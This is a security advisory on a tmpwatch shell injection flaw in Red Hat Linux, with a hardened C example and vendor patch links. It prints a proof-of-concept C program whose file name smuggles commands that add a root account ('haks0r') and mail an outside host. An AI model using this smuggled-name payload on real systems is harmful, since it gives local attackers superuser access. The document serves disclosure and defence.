COMMAND

    tmpwatch

SYSTEMS AFFECTED

    tmpwatch 2.2, 2.5.1

PROBLEM

    The following is based on an Internet Security Systems security
    advisory.  The tmpwatch utility is used in Red Hat Linux to remove
    temporary files.  This utility has an option to call the "fuser"
    program, which verifies whether a file is currently opened by a
    process.  The fuser program is invoked within tmpwatch by calling
    the system() library subroutine.  Insecure handling of the
    arguments to this subroutine could potentially allow an attacker
    to execute arbitrary commands.

    This  vulnerability  may  allow  local  attackers  to   compromise
    superuser access  if tmpwatch  is used  by the  administrator in a
    non-default manner.

    Affected versions:

        Red Hat Linux 7.0 (tmpwatch v2.5.1)
        Red Hat Linux 6.2 (tmpwatch v2.2)

    Use  the  'rpm  -q  tmpwatch'  command  to verify which version is
    installed.  The tmpwatch package as well as the package containing
    fuser are included in the default base installation.  By  default,
    tmpwatch with the fuser option is not used in any package  shipped
    with the Red Hat distributions.

    The tmpwatch tool removes files that have not been modified or
    accessed within a specified amount of time.  It was designed to
    securely remove files by avoiding typical race condition
    vulnerabilities.  System administrators usually run this tool
    periodically to remove old temporary files in world-writable
    directories.

    The tmpwatch tool uses the --fuser or -s options to avoid removing
    a file that is in an  open state in another process.   This option
    uses the system() library subroutine to call the external  program
    /sbin/fuser with the file name being examined as an argument.  The
    system() subroutine  spawns a  shell to  execute the  command.  An
    attacker may create a  file name containing shell  metacharacters,
    which could allow them  to execute arbitrary commands  if tmpwatch
    with the fuser option is used to remove the file.

    Source  code  comparison  between  the  Red  Hat Linux 6.2 and 7.0
    tmpwatch packages suggests  this vulnerability was  recognized and
    a  fix  was  attempted.   However,  the  fix is incorrect, and the
    vulnerability is still exploitable.
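    The following is an added example, not code from tmpwatch or from
    the ISS advisory, showing the two patterns the text contrasts: a
    command line built from the file name and handed to system(), and a
    hardened equivalent that passes the name to /sbin/fuser as a single
    argv element via fork()/execv(), so no shell ever parses it.  The
    function names, the metacharacter list and the sample file names
    are constructed for illustration; the /sbin/fuser path is the one
    named above, and the assumption that fuser exits 0 when some
    process has the file open follows the psmisc fuser behaviour.

```c
/* Added example (not tmpwatch's own code): the system()-based shell
 * injection pattern the advisory describes, next to a hardened
 * equivalent that never spawns a shell.  Names are constructed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Characters a POSIX shell interprets specially.  Any of these inside a
 * file name makes a command line built by string concatenation unsafe. */
static const char SHELL_METACHARS[] = ";|&<>`$(){}*?[]!#~\n\t '\"\\";

/* Returns 1 if the name contains a shell metacharacter, 0 otherwise.
 * Useful as a pre-check or for logging suspicious names in /tmp. */
int filename_has_shell_metachars(const char *name)
{
    return strpbrk(name, SHELL_METACHARS) != NULL;
}

/* VULNERABLE pattern (what the affected tmpwatch versions did): the file
 * name is pasted into a command line that system() hands to /bin/sh, so
 * the shell executes whatever the name contains.  This example only
 * builds the string so the reader can see what the shell would receive;
 * it is never passed to system() here. */
int build_unsafe_command(char *out, size_t outlen, const char *path)
{
    return snprintf(out, outlen, "/sbin/fuser %s", path);
}

/* HARDENED pattern: fork + execv with an argv array.  No shell is
 * involved, so the file name reaches fuser as one opaque argument no
 * matter which characters it contains.  Returns the child's exit status,
 * or -1 if fork/exec failed or the child did not exit normally. */
int run_no_shell(const char *prog, char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(prog, argv);
        _exit(127);               /* exec failed in the child */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    int code = WEXITSTATUS(status);
    return code == 127 ? -1 : code;
}

/* Assumption: fuser exits 0 when some process has the file open and
 * non-zero otherwise.  Returns 1 = in use, 0 = not in use, -1 = fuser
 * could not be run (the caller should then refuse to delete). */
int file_in_use(const char *path)
{
    char *argv[] = { "fuser", (char *)path, NULL };
    int rc = run_no_shell("/sbin/fuser", argv);
    if (rc < 0)
        return -1;
    return rc == 0 ? 1 : 0;
}

int main(void)
{
    /* Constructed hostile name in the shape the advisory describes. */
    const char *hostile = ";useradd -u 0 -g 0 haks0r;";
    char cmd[256];
    build_unsafe_command(cmd, sizeof cmd, hostile);
    printf("system() would receive: %s\n", cmd);
    printf("metacharacters present: %d\n", filename_has_shell_metachars(hostile));
    printf("file_in_use(\"/etc/passwd\") -> %d\n", file_in_use("/etc/passwd"));
    return 0;
}
```

    The point of run_no_shell() is that the argument vector goes straight
    to execv(): a name such as ";useradd -u 0 -g 0 haks0r;" is simply a
    file that fuser looks up and reports as absent.  Treating -1 from
    file_in_use() as "do not delete" keeps the fail-closed behaviour a
    cleanup tool should have when its helper cannot be run.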

    Here is a simple example from Alexander Y. Yurchenko of playing with
    the tmpwatch bug:

    1. Compile and run the following in /tmp

    #include <stdio.h>
    #include <stdlib.h>

    int main(void)
    {
       FILE *f;
       /* The file name itself carries the shell commands; the ';'
          terminates the fuser command once system() passes the name
          to the shell. */
       char filename[100] =
          ";useradd -u 0 -g 0 haks0r;mail haks0r@somehost.com<blablabla";

       if ((f = fopen(filename, "a")) == NULL) {
          perror("Could not create file");
          exit(1);
       }
       fclose(f);
       return 0;
    }

    2. cp /usr/sbin/adduser /tmp
    3. Just wait for mail

SOLUTION

    Do not use the --fuser or  -s options with tmpwatch.  Red  Hat has
    issued  the   following  RPMs   that  contain   fixes  for    this
    vulnerability:

        ftp://updates.redhat.com/6.2/alpha/tmpwatch-2.6.2-1.6.2.alpha.rpm
        ftp://updates.redhat.com/6.2/sparc/tmpwatch-2.6.2-1.6.2.sparc.rpm
        ftp://updates.redhat.com/6.2/i386/tmpwatch-2.6.2-1.6.2.i386.rpm
        ftp://updates.redhat.com/6.2/SRPMS/tmpwatch-2.6.2-1.6.2.src.rpm
        ftp://updates.redhat.com/7.0/i386/tmpwatch-2.6.2-1.7.i386.rpm
        ftp://updates.redhat.com/7.0/SRPMS/tmpwatch-2.6.2-1.7.src.rpm

    For ImmunixOS:

        http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/tmpwatch-2.6.2-1.6.2_StackGuard.i386.rpm
        http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/tmpwatch-2.6.2-1.6.2_StackGuard.src.rpm

    For Linux-Mandrake:

        Linux-Mandrake 6.0: 6.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
                            6.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
        Linux-Mandrake 6.1: 6.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
                            6.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
        Linux-Mandrake 7.0: 7.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
                            7.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
        Linux-Mandrake 7.1: 7.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
                            7.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm

    For Conectiva Linux:

        ftp://atualizacoes.conectiva.com.br/4.0/i386/tmpwatch-2.6.2-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/tmpwatch-2.6.2-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/tmpwatch-2.6.2-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/tmpwatch-2.6.2-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/tmpwatch-2.6.2-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/tmpwatch-2.6.2-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/tmpwatch-2.6.2-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/tmpwatch-2.6.2-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/tmpwatch-2.6.2-1cl.src.rpm

    The tmpwatch packages as shipped with SuSE distributions are not
    vulnerable to the attacks discussed on security forums, which were
    initiated and discovered by zenith parsec.

    All users of Trustix Secure Linux (TSL) should upgrade to the new RPM:

        http://www.trustix.net/download/Trustix/updates/1.1/RPMS/tmpwatch-2.6.2-1tr.i586.rpm
        ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/tmpwatch-2.6.2-1tr.i586.rpm